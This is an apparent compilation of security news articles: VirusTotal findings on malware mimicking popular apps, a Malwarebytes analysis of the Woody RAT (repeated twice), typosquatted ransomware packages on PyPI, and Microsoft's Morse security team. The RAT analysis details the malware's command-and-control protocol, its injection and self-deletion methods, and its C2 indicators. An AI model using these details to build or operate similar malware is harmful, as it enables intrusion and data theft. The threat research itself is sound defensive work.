By Deeba Ahmed
According to the latest research findings from VirusTotal, cybercriminals and threat actors are increasingly relying on mimicked versions…
This is a post from HackRead.com Read the original post: VirusTotal Reveals Apps Most Exploited by Hackers to Spread Malware

According to the latest research findings from **VirusTotal**, cybercriminals and threat actors are increasingly relying on mimicked versions of genuine, common-use apps such as Adobe Reader, Skype, and VLC Player to successfully conduct social engineering attacks.

**Findings Details**

In their study of malware, researchers at Google’s VirusTotal revealed that cybercriminals deploy numerous approaches to abuse the trust users have in many reputable apps.

The most widespread tactic is **mimicking legit apps to deliver malware**. In this technique, the app’s icon is replicated to gain the victim’s trust and convince them to use the mimicked app. The purpose behind this malicious new strategy is to bypass security solutions such as IP or domain-based firewalls on devices and spread malware via trusted domains.

Another commonly used attack tactic is stealing authentic signing certificates from legit software vendors and using them for signing the malware. Reportedly, since 2021, over one million signed samples had been declared suspicious.

Around thirteen percent of the samples checked by Google’s team didn’t have a valid signature when uploaded on VirusTotal for the first time, and over ninety-nine percent of them were DLL or Windows Portable Executable files.

This happens because the process of examining the validity of a signed file can be abused by malware stated VirusTotal security engineer Vicente Diaz. This becomes concerning when attackers start stealing legit certificates and creating an **ideal supply chain attack scenario**.

The third technique is incorporating legit installers as a portable executable resource into malicious samples to execute the installer when malware is run.

1.  **Microsoft Office Most Exploited Software in Malware Attacks**
2.  **US and China Exposed Most Databases Among 380k Found in 2021**
3.  **Fake reviews & third-party apps cause 50% of threats against Android**
4.  **134 million downloads in 85 countries: A look at VPN usage in H1 2020**
5.  **Google, Microsoft and Oracle generated the most vulnerabilities in 2021**
6.  **Google Drive accounted for 50% of malicious Office document downloads**

**Over 2 Million Suspicious Files Downloaded from Top Domains**

According to VirusTotal’s **blog post**, ten percent of the **top 1,000 Alexa domains** had distributed suspicious samples, including the domains commonly used for distributing files, and over 2 million shady files were downloaded from these domains.

Despite the technique’s simplicity, Diaz explains, it can effectively avoid raising red flags for the victim. That’s why many channels are becoming popular as potent malware distribution vectors. This includes the distribution of **cracked software**.

**Most Abused Websites and Apps**

The top three mimicked apps include the following:

*   Adobe Acrobat
*   VLC media player
*   Skype VoIP platform

When they researchers examined the URLs using web icon similarity, WhatsApp, Instagram, Facebook, and iCloud were the four most abused sites.

> “Adobe Acrobat, Skype, and 7zip are very popular and have the highest infection ratio, which probably makes them the top three applications and icons to be aware of from a social engineering perspective.”
> 
> VirusTotal

Furthermore, VirusTotal discovered 1,816 samples since January 2020 masquerading legit software by hiding the malware in installers for popular software like Zoom, Google Chrome, Proton VPN, Brave, and Mozilla Firefox.

Other impersonated apps by icon were TeamViewer, 7-Zip, CCleaner, Steam, Microsoft Edge, Zoom, and WhatsApp. The abused domains included are discordappcom, squarespacecom, amazonawscom, mediafirecom, and qqcom. 

The reason why attackers are using these software and apps is unknown as yet but one reason could be their popularity, Diaz stated.

**More Malware News**

1.  **Malware families using Pay-Per-Install service to expand targets**
2.  **This malware hides behind free VPN, pirated security software keys**
3.  **Fake KPSPico Windows activator tool KPSPico steals crypto wallet data**
4.  **Malware droppers for hire targeting users on fake pirated software sites**
5.  **Researchers Warn of New Variants of ChromeLoader Browser in the Wild**

VirusTotal Reveals Apps Most Exploited by Hackers to Spread Malware

The Malwarebytes Threat Intelligence team has discovered a new Remote Access Trojan that we dubbed Woody Rat used to target Russian entities.
The post Woody RAT: A new feature-rich malware spotted in the wild appeared first on Malwarebytes Labs.

_This blog post was authored by Ankur Saini and Hossein Jazi_

The Malwarebytes Threat Intelligence team has identified a new Remote Access Trojan we are calling Woody Rat that has been in the wild for at least one year.

This advanced custom Rat is mainly the work of a threat actor that targets Russian entities by using lures in archive file format and more recently Office documents leveraging the Follina vulnerability.

Based on a fake domain registered by the threat actors, we know that they tried to target a Russian aerospace and defense entity known as OAK.

In this blog post, we will analyze Woody Rat’s distribution methods, capabilities as well as communication protocol.

**Distribution methods**

Based on our knowledge, Woody Rat has been distributed using two different formats: archive files and Office documents using the Follina vulnerability.

The earliest versions of this Rat was typically archived into a zip file pretending to be a document specific to a Russian group. When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload, as identified by @MalwareHunterTeam.

The following diagram shows the overall attack flow used by the threat actor to drop Woody Rat:

Woody Rat distribution methods

**Archive files**

In this method, Woody Rat is packaged into an archive file and sent to victims. We believe that these archive files have been distributed using spear phishing emails. Here are some examples of these archive files:

*   _anketa\_brozhik.doc.zip_: It contains Woody Rat with the same name: _Anketa\_Brozhik.doc.exe_.
*   _zayavka.zip_: It contains Woody Rat pretending to be an application (application for participation in the _selection.doc.exe_).

**Follina vulnerability**

The threat actor is using a Microsoft Office document (_Памятка.docx_) that has weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat. The used lure is in Russian is called “_Information security memo_” which provide security practices for passwords, confidential information, etc.

Document lure

**Woody Rat Analysis**

The threat actor has left some debugging information including a pdb path from which we derived and picked a name for this new Rat:

Debug Information

A lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. Before initialization, the malware effectively suppresses all error reporting by calling SetErrorMode with 0x8007 as parameter.

main function

As we will see later, that malware uses multiple threads and so it allocates a global object and assigns a mutex to it to make sure no two clashing operations can take place at the same time. This object enforces that only one thread is reaching out to the C2 at a given time and that there are no pending requests before making another request.

**Deriving the Cookie**

The malware communicates with its C2 using HTTP requests. To uniquely identify each infected machine, the malware derives a cookie from machine specific values. The values are taken from the adapter information, computer name and volume information, and 8 random bytes are appended to this value to avoid any possible cookie collisions by the malware.

A combination of _GetAdaptersInfo_, _GetComputerNameA_ and _GetVolumeInformationW_ functions are used to retrieve the required data to generate the cookie. This cookie is sent with every HTTP request that is made to the C2.

get\_cookie\_data function

**Data encryption with HTTP requests**

To evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. The public key used for RSA-4096 is embedded inside the binary and the malware formulates the RSA public key blob at runtime using the embedded data and imports it using the _BCryptImportKeyPair_ function.

The malware derives the key for AES-CBC at runtime by generating 32 random bytes; these 32 bytes are then encrypted with RSA-4096 and sent to the C2. Both the malware and C2 simultaneously use these bytes to generate the AES-CBC key using _BCryptGenerateSymmetricKey_ which is used in subsequent HTTP requests to encrypt and decrypt the data. For encryption and decryption the malware uses _BCryptEncrypt_ and _BCryptDecrypt_ respectively.

RSA Encryption routine

AES Encryption Routine

**C2 HTTP endpoint request**

**knock** – This is the first HTTP request that the malware makes to the C2. The machine-specific cookie is sent as part of the headers here. This is a POST request and the data of this request contains 32 random bytes which are used to derive AES-CBC key, while the 32 bytes are RSA-4096 encrypted.

The data received as response for this request is decrypted and it contains the url path to submit (/submit) the additional machine information which the malware generates after this operation.

knock request headers

**submit** – This endpoint request is used to submit information about the infected machine. The data sent to the C2 is AES-CBC encrypted. Data sent via submit API includes:

*   OS
*   Architecture
*   Antivirus installed
*   Computer Name
*   OS Build Version
*   .NET information
*   PowerShell information
*   Python information (Install path, version etc.)
*   Storage drives – includes Drive path, Internal name etc.
*   Environment Variables
*   Network Interfaces
*   Administrator privileges
*   List of running processes
*   Proxy information
*   Username
*   List of all the User accounts

The malware currently detects 6 AVs through Registry Keys; these AVs being Avast Software, Doctor Web, Kaspersky, AVG, ESET and Sophos.

**ping** – The malware makes a ping GET http request to the C2 at regular intervals. If the C2 responds with “\_CRY” then the malware proceeds to send the knock request again but if the C2 responds with “\_ACK” the response contains additional information about which command should be executed by the malware.

The malware supports a wide variety of commands which are classified into \_SET and \_REQ requests as seen while analyzing the malware. We will dive into all these commands below in the blog.

**C2 Commands**

The malware uses a specific thread to communicate with the C2 and a different one to execute the commands received from the C2. To synchronize between both threads, the malware leverages events and mutex. To dispatch a command it modifies the state of the event linked to that object. We should note all the communications involved in these commands are AES encrypted.

Command execution routine

**\_SET Commands**

*   **PING** – This command is used to set the sleep interval between every ping request to the C2.
*   **PURG** – Unknown command
*   **EXIT** – Exit the command execution thread.

**\_REQ Commands**

*   **EXEC** (Execute)- Executes the command received from the C2 by creating a cmd.exe process, the malware creates two named pipes and redirects the input and output to these pipes. The output of the command is read using _ReadFile_ from the named pipe and then “\_DAT” is appended to this data before it is AES encrypted and sent to the C2.

EXEC command

*   **UPLD** (Upload) – The Upload command is used to remotely upload a file to the infected machine. The malware makes a GET request to the C2 and receives data to be written as file.
*   **INFO** (Submit Information) – The INFO command is similar to the “submit” request above; this command sends the exact information to the C2 as sent by the “submit” request.

INFO command

*   **UPEX** (Upload and Execute) – This is a combination of UPLD and EXEC command. The commands first writes a file received from the C2 and then executes that file.
*   **DNLD** (Download) – The DNLD command allows the C2 to retrieve any file from the infected machine. The malware encrypts the requested file and sends the data via a POST request to the C2.
*   **PROC** (Execute Process) – The PROC command is similar to the EXEC command with slight differences, here the process is directly executed instead of executing it with cmd.exe as in EXEC command. The command uses the named pipes in similar fashion as used by the EXEC command.
*   **UPPR** (Upload and Execute Process) – This is a combination of UPLD and PROC command. The command receives the remote file using the upload command then executes the file using PROC command.
*   **SDEL** (Delete File) – This is used to delete any file on the infected system. It also seems to overwrite the first few bytes of the file to be deleted with random data.
*   **\_DIR** (List directory) – This can list all the files and their attributes in a directory supplied as argument. If no directory is supplied, then it proceeds to list the current directory. File attributes retrieved by this command are:
    *   Filename
    *   Type (Directory, Unknown, File)
    *   Owner
    *   Creation time
    *   Last access time
    *   Last write time
    *   Size
    *   Permissions
*   **STCK** (Command Stack) – This allows the attacker to execute multiple commands with one request. The malware can receive a STCK command which can have multiple children commands which are executed in the same order they are received by the malware.
*   **SCRN** (Screenshot) – This command leverages Windows GDI+ to take the screenshot of the desktop. The image is then encrypted using AES-CBC and sent to the C2.
*   **INJC** (Process Injection) – The malware seems to generate a new AES key for this command. The code to be injected is received from the C2 and decrypted. To inject the code into the target process it writes it to the remote memory using WriteProcessMemory and then creates a remote thread using CreateRemoteThread.

INJC routine

*   **PSLS** (Process List) – Calls _NtQuerySystemInformation_ with _SystemProcessInformation_ to retrieve an array containing all the running processes. Information sent about each process to the C2:
    *   PID
    *   ParentPID
    *   Image Name
    *   Owner
*   **DMON** (Creates Process) – The command seems similar to PROC with the only difference being the output of the process execution is not sent back to the C2. It receives the process name from the C2 and executes it using CreateProcess.
*   **UPDM** (Upload and Create Process) – Allows the C2 and upload a file and then execute it using DMON command.

**SharpExecutor and PowerSession Commands**

Interestingly, the malware has 2 .NET DLLs embedded inside. These DLLs are named _WoodySharpExecutor_ and _WoodyPowerSession_ respectively. _WoodySharpExecutor_ provides the malware ability to run .NET code received from the C2. _WoodyPowerSession_ on the other hand allows the malware to execute PowerShell commands and scripts received from the C2.

_WoodyPowerSession_ makes use of pipelines to execute these PS commands. The .NET dlls are loaded by the malware and commands are executed via the methods present in these DLLs:

SharpExecutor and PowerSession methods

We will look at the commands utilising these DLLs below:

*   **DN\_B** (DotNet Binary) – This command makes use of the RunBinaryStdout method to execute Assembly code with arguments received from the C2. The code is received as an array of Base64 strings separated by 0x20 character.
*   **DN\_D** (DotNet DLL) – This method provides the attacker a lot more control over the execution. An attacker can choose whether to send the console output back to the C2 or not. The method receives an array of Base64 strings consisting of code, class name, method name and arguments. The DLL loads the code and finds and executes the method based on other arguments received from the C2.
*   **PSSC** (PowerSession Shell Command) – Allows the malware to receive a Base64 encoded PowerShell command and execute it.
*   **PSSS** (PowerSession Shell Script) – This command allows the malware to load and execute a Base64 encoded PowerShell script received from the C2.
*   **PSSM** (PowerSession Shell Module) – This command receives an array of Base64 encoded strings, one of which contains the module contents and the other one contains the module name. These strings are decoded and this module is imported to the command pipeline and then invoked.

**Malware Cleanup**

After creating the command threads, the malware deletes itself from disk. It uses the more commonly known _ProcessHollowing_ technique to do so. It creates a suspended notepad process and then writes shellcode to delete a file into the suspended process using _NtWriteVirtualMemory_. The entry point of the thread is set by using the _NtSetContextThread_ method and then the thread is resumed. This leads to the deletion of the malware from disk.

Malware deletes itself

**Unknown threat actor**

This very capable Rat falls into the category of unknown threat actors we track. Historically, Chinese APTs such as Tonto team as well as North Korea with Konni have targeted Russia. However, nased on what we were able to collect, there weren’t any solid indicators to attribute this campaign to a specific threat actor.

Malwarebytes blocks the Follina exploit that is being leveraged in the latest Woody Rat campaign. We also already detected the binary payloads via our heuristic malware engines.

**IOCs**

**Woody** **Rat**:

*   982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0
*   66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b
*   b65bc098b475996eaabbb02bb5fee19a18c6ff2eee0062353aff696356e73b7a
*   43b15071268f757027cf27dd94675fdd8e771cdcd77df6d2530cb8e218acc2ce
*   408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e
*   0588c52582aad248cf0c43aa44a33980e3485f0621dba30445d8da45bba4f834
*   5c5020ee0f7a5b78a6da74a3f58710cba62f727959f8ece795b0f47828e33e80
*   3ba32825177d7c2aac957ff1fc5e78b64279aeb748790bc90634e792541de8d3
*   9bc071fb6a1d9e72c50aec88b4317c3eb7c0f5ff5906b00aa00d9e720cbc828d

**C2s:**

*   kurmakata.duckdns\[.\]org
*   microsoft-ru-data\[.\]ru
*   194.36.189.179
*   microsoft-telemetry\[.\]ru
*   oakrussia\[.\]ru

**Follina Doc:**  
Памятка.docx  
ffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb  
**Follina html file:**  
garmandesar.duckdns\[.\]org:444/uoqiuwef.html  
**Woody Rat url:**  
fcloud.nciinform\[.\]ru/main.css (edited)

Woody RAT: A new feature-rich malware spotted in the wild

Categories: Threat Intelligence
Tags: APT

Tags: rat

Tags: russia

The Malwarebytes Threat Intelligence team has discovered a new Remote Access Trojan that we dubbed Woody Rat used to target Russian entities.



(Read more...)




The post Woody RAT: A new feature-rich malware spotted in the wild appeared first on Malwarebytes Labs.

_This blog post was authored by Ankur Saini and Hossein Jazi_

The Malwarebytes Threat Intelligence team has identified a new Remote Access Trojan we are calling Woody Rat that has been in the wild for at least one year.

This advanced custom Rat is mainly the work of a threat actor that targets Russian entities by using lures in archive file format and more recently Office documents leveraging the Follina vulnerability.

Based on a fake domain registered by the threat actors, we know that they tried to target a Russian aerospace and defense entity known as OAK.

In this blog post, we will analyze Woody Rat's distribution methods, capabilities as well as communication protocol.

**Distribution methods**

Based on our knowledge, Woody Rat has been distributed using two different formats: archive files and Office documents using the Follina vulnerability.

The earliest versions of this Rat was typically archived into a zip file pretending to be a document specific to a Russian group. When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload, as identified by @MalwareHunterTeam.

The following diagram shows the overall attack flow used by the threat actor to drop Woody Rat:

Woody Rat distribution methods

**Archive files**

In this method, Woody Rat is packaged into an archive file and sent to victims. We believe that these archive files have been distributed using spear phishing emails. Here are some examples of these archive files:

*   _anketa\_brozhik.doc.zip_: It contains Woody Rat with the same name: _Anketa\_Brozhik.doc.exe_.
*   _zayavka.zip_: It contains Woody Rat pretending to be an application (application for participation in the _selection.doc.exe_).

**Follina vulnerability**

The threat actor is using a Microsoft Office document (_Памятка.docx_) that has weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat. The used lure is in Russian is called "_Information security memo_" which provide security practices for passwords, confidential information, etc.

Document lure

**Woody Rat Analysis**

The threat actor has left some debugging information including a pdb path from which we derived and picked a name for this new Rat:

Debug Information

A lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. Before initialization, the malware effectively suppresses all error reporting by calling SetErrorMode with 0x8007 as parameter.

main function

As we will see later, that malware uses multiple threads and so it allocates a global object and assigns a mutex to it to make sure no two clashing operations can take place at the same time. This object enforces that only one thread is reaching out to the C2 at a given time and that there are no pending requests before making another request.

**Deriving the Cookie**

The malware communicates with its C2 using HTTP requests. To uniquely identify each infected machine, the malware derives a cookie from machine specific values. The values are taken from the adapter information, computer name and volume information, and 8 random bytes are appended to this value to avoid any possible cookie collisions by the malware.

A combination of _GetAdaptersInfo_, _GetComputerNameA_ and _GetVolumeInformationW_ functions are used to retrieve the required data to generate the cookie. This cookie is sent with every HTTP request that is made to the C2.

get\_cookie\_data function

**Data encryption with HTTP requests**

To evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. The public key used for RSA-4096 is embedded inside the binary and the malware formulates the RSA public key blob at runtime using the embedded data and imports it using the _BCryptImportKeyPair_ function.

The malware derives the key for AES-CBC at runtime by generating 32 random bytes; these 32 bytes are then encrypted with RSA-4096 and sent to the C2. Both the malware and C2 simultaneously use these bytes to generate the AES-CBC key using _BCryptGenerateSymmetricKey_ which is used in subsequent HTTP requests to encrypt and decrypt the data. For encryption and decryption the malware uses _BCryptEncrypt_ and _BCryptDecrypt_ respectively.

RSA Encryption routine

AES Encryption Routine

**C2 HTTP endpoint request**

**knock** - This is the first HTTP request that the malware makes to the C2. The machine-specific cookie is sent as part of the headers here. This is a POST request and the data of this request contains 32 random bytes which are used to derive AES-CBC key, while the 32 bytes are RSA-4096 encrypted.

The data received as response for this request is decrypted and it contains the url path to submit (/submit) the additional machine information which the malware generates after this operation.

knock request headers

**submit** \- This endpoint request is used to submit information about the infected machine. The data sent to the C2 is AES-CBC encrypted. Data sent via submit API includes:

*   OS
*   Architecture
*   Antivirus installed
*   Computer Name
*   OS Build Version
*   .NET information
*   PowerShell information
*   Python information (Install path, version etc.)
*   Storage drives - includes Drive path, Internal name etc.
*   Environment Variables
*   Network Interfaces
*   Administrator privileges
*   List of running processes
*   Proxy information
*   Username
*   List of all the User accounts

The malware currently detects 6 AVs through Registry Keys; these AVs being Avast Software, Doctor Web, Kaspersky, AVG, ESET and Sophos.

**ping** - The malware makes a ping GET http request to the C2 at regular intervals. If the C2 responds with "\_CRY" then the malware proceeds to send the knock request again but if the C2 responds with "\_ACK" the response contains additional information about which command should be executed by the malware.

The malware supports a wide variety of commands which are classified into \_SET and \_REQ requests as seen while analyzing the malware. We will dive into all these commands below in the blog.

**C2 Commands**

The malware uses a specific thread to communicate with the C2 and a different one to execute the commands received from the C2. To synchronize between both threads, the malware leverages events and mutex. To dispatch a command it modifies the state of the event linked to that object. We should note all the communications involved in these commands are AES encrypted.

Command execution routine

**\_SET Commands**

*   **PING** - This command is used to set the sleep interval between every ping request to the C2.
*   **PURG** - Unknown command
*   **EXIT** - Exit the command execution thread.

**\_REQ Commands**

*   **EXEC** (Execute)- Executes the command received from the C2 by creating a cmd.exe process, the malware creates two named pipes and redirects the input and output to these pipes. The output of the command is read using _ReadFile_ from the named pipe and then "\_DAT" is appended to this data before it is AES encrypted and sent to the C2.

EXEC command

*   **UPLD** (Upload) - The Upload command is used to remotely upload a file to the infected machine. The malware makes a GET request to the C2 and receives data to be written as file.
*   **INFO** (Submit Information) - The INFO command is similar to the "submit" request above; this command sends the exact information to the C2 as sent by the "submit" request.

INFO command

*   **UPEX** (Upload and Execute) - This is a combination of UPLD and EXEC command. The commands first writes a file received from the C2 and then executes that file.
*   **DNLD** (Download) - The DNLD command allows the C2 to retrieve any file from the infected machine. The malware encrypts the requested file and sends the data via a POST request to the C2.
*   **PROC** (Execute Process) - The PROC command is similar to the EXEC command with slight differences, here the process is directly executed instead of executing it with cmd.exe as in EXEC command. The command uses the named pipes in similar fashion as used by the EXEC command.
*   **UPPR** (Upload and Execute Process) - This is a combination of UPLD and PROC command. The command receives the remote file using the upload command then executes the file using PROC command.
*   **SDEL** (Delete File) - This is used to delete any file on the infected system. It also seems to overwrite the first few bytes of the file to be deleted with random data.
*   **\_DIR** (List directory) - This can list all the files and their attributes in a directory supplied as argument. If no directory is supplied, then it proceeds to list the current directory. File attributes retrieved by this command are:
    *   Filename
    *   Type (Directory, Unknown, File)
    *   Owner
    *   Creation time
    *   Last access time
    *   Last write time
    *   Size
    *   Permissions
*   **STCK** (Command Stack) - This allows the attacker to execute multiple commands with one request. The malware can receive a STCK command which can have multiple children commands which are executed in the same order they are received by the malware.
*   **SCRN** (Screenshot) - This command leverages Windows GDI+ to take the screenshot of the desktop. The image is then encrypted using AES-CBC and sent to the C2.
*   **INJC** (Process Injection) - The malware seems to generate a new AES key for this command. The code to be injected is received from the C2 and decrypted. To inject the code into the target process it writes it to the remote memory using WriteProcessMemory and then creates a remote thread using CreateRemoteThread.

INJC routine

*   **PSLS** (Process List) - Calls _NtQuerySystemInformation_ with _SystemProcessInformation_ to retrieve an array containing all the running processes. Information sent about each process to the C2:
    *   PID
    *   ParentPID
    *   Image Name
    *   Owner
*   **DMON** (Creates Process) - The command seems similar to PROC with the only difference being the output of the process execution is not sent back to the C2. It receives the process name from the C2 and executes it using CreateProcess.
*   **UPDM** (Upload and Create Process) - Allows the C2 and upload a file and then execute it using DMON command.

**SharpExecutor and PowerSession Commands**

Interestingly, the malware has 2 .NET DLLs embedded inside. These DLLs are named _WoodySharpExecutor_ and _WoodyPowerSession_ respectively. _WoodySharpExecutor_ provides the malware ability to run .NET code received from the C2. _WoodyPowerSession_ on the other hand allows the malware to execute PowerShell commands and scripts received from the C2.

_WoodyPowerSession_ makes use of pipelines to execute these PS commands. The .NET dlls are loaded by the malware and commands are executed via the methods present in these DLLs:

SharpExecutor and PowerSession methods

We will look at the commands utilising these DLLs below:

*   **DN\_B** (DotNet Binary) - This command makes use of the RunBinaryStdout method to execute Assembly code with arguments received from the C2. The code is received as an array of Base64 strings separated by 0x20 character.
*   **DN\_D** (DotNet DLL) - This method provides the attacker a lot more control over the execution. An attacker can choose whether to send the console output back to the C2 or not. The method receives an array of Base64 strings consisting of code, class name, method name and arguments. The DLL loads the code and finds and executes the method based on other arguments received from the C2.
*   **PSSC** (PowerSession Shell Command) - Allows the malware to receive a Base64 encoded PowerShell command and execute it.
*   **PSSS** (PowerSession Shell Script) - This command allows the malware to load and execute a Base64 encoded PowerShell script received from the C2.
*   **PSSM** (PowerSession Shell Module) - This command receives an array of Base64 encoded strings, one of which contains the module contents and the other one contains the module name. These strings are decoded and this module is imported to the command pipeline and then invoked.

**Malware Cleanup**

After creating the command threads, the malware deletes itself from disk. It uses the more commonly known _ProcessHollowing_ technique to do so. It creates a suspended notepad process and then writes shellcode to delete a file into the suspended process using _NtWriteVirtualMemory_. The entry point of the thread is set by using the _NtSetContextThread_ method and then the thread is resumed. This leads to the deletion of the malware from disk.

Malware deletes itself

**Unknown threat actor**

This very capable Rat falls into the category of unknown threat actors we track. Historically, Chinese APTs such as Tonto team as well as North Korea with Konni have targeted Russia. However, based on what we were able to collect, there weren't any solid indicators to attribute this campaign to a specific threat actor.

Malwarebytes blocks the Follina exploit that is being leveraged in the latest Woody Rat campaign. We also already detected the binary payloads via our heuristic malware engines.

**IOCs**

**Woody****Rat**:

*   982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0
*   66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b
*   b65bc098b475996eaabbb02bb5fee19a18c6ff2eee0062353aff696356e73b7a
*   43b15071268f757027cf27dd94675fdd8e771cdcd77df6d2530cb8e218acc2ce
*   408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e
*   0588c52582aad248cf0c43aa44a33980e3485f0621dba30445d8da45bba4f834
*   5c5020ee0f7a5b78a6da74a3f58710cba62f727959f8ece795b0f47828e33e80
*   3ba32825177d7c2aac957ff1fc5e78b64279aeb748790bc90634e792541de8d3
*   9bc071fb6a1d9e72c50aec88b4317c3eb7c0f5ff5906b00aa00d9e720cbc828d

**C2s:**

*   kurmakata.duckdns\[.\]org
*   microsoft-ru-data\[.\]ru
*   194.36.189.179
*   microsoft-telemetry\[.\]ru
*   oakrussia\[.\]ru

**Follina Doc:**  
Памятка.docx  
ffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb  
**Follina html file:**  
garmandesar.duckdns\[.\]org:444/uoqiuwef.html  
**Woody Rat url:**  
fcloud.nciinform\[.\]ru/main.css (edited)

The malware packages had names that were common typosquats of a legitimate widely used Python library. One was downloaded hundreds of times.

An apparently school-age hacker based in Verona, Italy, has become the latest to demonstrate why developers need to pay close attention to what they download from public code repositories these days.

The young hacker recently uploaded multiple malicious Python packages containing ransomware scripts to the Python Package Index (PyPI), supposedly as an experiment.

The packages were named "requesys," "requesrs," and "requesr," which are all common typosquats of "requests" — a legitimate and widely used HTTP library for Python.

According to the researchers at Sonatype who spotted the malicious code on PyPI, one of the packages (requesys) was downloaded about 258 times — presumably by developers who made typographical errors when attempting to download the real "requests" package. The package had scripts for traversing folders such as Documents, Downloads, and Pictures on Windows systems and encrypting them. 

One version of the requesys package contained the encryption and decryption code in plaintext Python. But a subsequent version contained a Base64-obfuscated executable that made analysis a little harder, according to Sonatype.

**An Absence of Malice?**

Developers who ended up with their system encrypted received a pop-up message instructing them to contact the author of the package — "b8ff" (aka "OHR" or Only Hope Remains) — on his Discord channel, for the decryption key. Victims were able to obtain the decryption key without having to make a payment for it, Sonatype says.

"And that makes this case more of a gray area rather than outright malicious activity," Sonatype concludes. Information on the hacker's Discord channel shows that at least 15 victims had installed and run the package.

Sonatype discovered the malware on July 28 and immediately reported it to PyPI's administrators, the company says. Two of the packages have since been removed and the hacker has renamed the requesys package, so developers no longer mistake it for a legitimate package.

"There are two takeaways here," says Ankita Lamba, senior security researcher, at Sonatype. "First, be cautious when typing out the names of popular libraries, as typosquatting is one of the most common attack methods for malware," she says.

Second and more broadly, developers should always be cautious about what they’re downloading and what packages they’re incorporating into their software builds. "Open source is both critical fuel for digital innovation and a ripe target for software supply chain attacks," Lamba says.

**Growing Number of Malicious Code in Repositories**

The incident is among a growing number of instances recently in which threat actors have planted malicious code in widely used software repositories, with the goal of getting developers to download and install it in their environments. 

Some of them — like the latest incident — have involved typosquatted packages, or malware with similar sounding names as legitimate software on public software repositories. In May, for instance, Sonatype found that some 300 developers had downloaded a malicious package for distributing Cobalt Strike called "Pymafka" from the PyPI registry, thinking it was "PyKafka," a legitimate and widely downloaded Kafka client. 

Also in May, Sonatype discovered another malicious package on PyPI called "karaspace," used for stealing system information, that had the same name as a legitimate Kafka project on GitHub.

In July, researchers at Kaspersky discovered four information-stealing packages in the Node Package Manager (npm) repository. The same month, ReversingLabs reported finding some two-dozen, heavily obfuscated npm modules for stealing data that had been downloaded more than 27,000 times. The vendor estimated the malicious packages were likely installed in hundreds — and likely even thousands — of mobile applications and websites.

Security researchers have pointed to the trend as heightening the need for organizations to pay closer attention to their software supply chains — especially when it comes to using open source software from public repositories such as PyPI, npm, and Maven Central.

**A "Fun" Research Project**

Following the latest discovery, researchers at Sonatype contacted the author of the malicious code and found him to be a self-described school-going hacker apparently intrigued by exploits and the ease of developing them.

Lamba says b8ff told Sonatype that the ransomware script was completely open source and part of a project that he had developed for fun.

"As they are a school-going 'learning developer,' this was meant to be a fun research project on ransomware exploits that could have easily gone much further astray," Lamba says. "The author went on to say that they were surprised to see how easy it was to create this exploit and how interesting it was."

School Kid Uploads Ransomware Scripts to PyPI Repository as 'Fun' Project

What's it like to be responsible for a billion people's digital security? Just ask the company's Morse researchers.

As a rush of cybercriminals, state-backed hackers, and scammers continue to flood the zone with digital attacks and aggressive campaigns worldwide, it’s no surprise that the maker of the ubiquitous Windows operating system is focused on security defense. Microsoft’s Patch Tuesday update releases frequently contain fixes for critical vulnerabilities, including those that are actively being exploited by attackers out in the world.

The company already has the requisite groups to hunt for weaknesses in its code (the “red team") and develop mitigations (the “blue team”). But recently, that format evolved again to promote more collaboration and interdisciplinary work in the hopes of catching even more mistakes and flaws before things start to spiral. Known as Microsoft Offensive Research & Security Engineering, or Morse, the department combines the red team, blue team, and so-called green team, which focuses on finding flaws or taking weaknesses the red team has found and fixing them more systemically through changes to how things are done within an organization.

“People are convinced that you cannot move forward without investing in security,” says David Weston, Microsoft’s vice president of enterprise and operating system security who’s been at the company for 10 years. “I’ve been in security for a very long time. For most of my career, we were thought of as annoying. Now, if anything, leaders are coming to me and saying, ‘Dave, am I OK? Have we done everything we can?’ That’s been a significant change.”

Morse has been working to promote safe coding practices across Microsoft so fewer bugs end up in the company’s software in the first place. OneFuzz, an open source Azure testing framework, allows Microsoft developers to be constantly, automatically pelting their code with all sorts of unusual use cases to ferret out flaws that wouldn’t be noticeable if the software was only being used exactly as intended.

The combined team has also been at the forefront of promoting the use of safer programming languages (like Rust) across the company. And they’ve advocated embedding security analysis tools directly into the real software compiler used in the company’s production workflow. That change has been impactful, Weston says, because it means developers aren’t doing hypothetical analysis in a simulated environment where some bugs might be overlooked at a step removed from real production.

The Morse team says the shift toward proactive security has led to real progress. In a recent example, Morse members were vetting historic software—an important part of the group’s job, since so much of the Windows codebase was developed before these expanded security reviews. While examining how Microsoft had implemented Transport Layer Security 1.3, the foundational cryptographic protocol used across networks like the internet for secure communication, Morse discovered a remotely exploitable bug that could have allowed attackers to access targets’ devices.

As Mitch Adair, Microsoft’s principal security lead for Cloud Security, put it: “It would have been as bad as it gets. TLS is used to secure basically every single service product that Microsoft uses.”

The stakes are indescribably high when your job is to catch mistakes before someone else does in a product that’s used by more than a billion people around the world. Anything you let slip by could play a role in the next global cybersecurity crisis. But Weston says the Morse team self-selects for people who view that reality as a driving motivation, rather than a paralyzing specter.

“This is a game of inches; you can be amazing 99.9 percent of the time and introduce the wrong code at the wrong time and it can have dire consequences,” Weston says. “If you work on the top of a tall building all day, you don’t even notice it. But one day you might look down and go, ‘whoa, I’m pretty high up here, that’s scary.' But there are only a couple of places where you can do things at a billion scale, so the nice thing is we rarely have someone coming in who doesn’t find that exciting rather than scary.”

Perhaps most importantly, Weston says the tradeoff for living with Microsoft’s scale and the accompanying responsibility is that anything is possible at the company in a way that is only true at a small handful of the biggest tech giants.

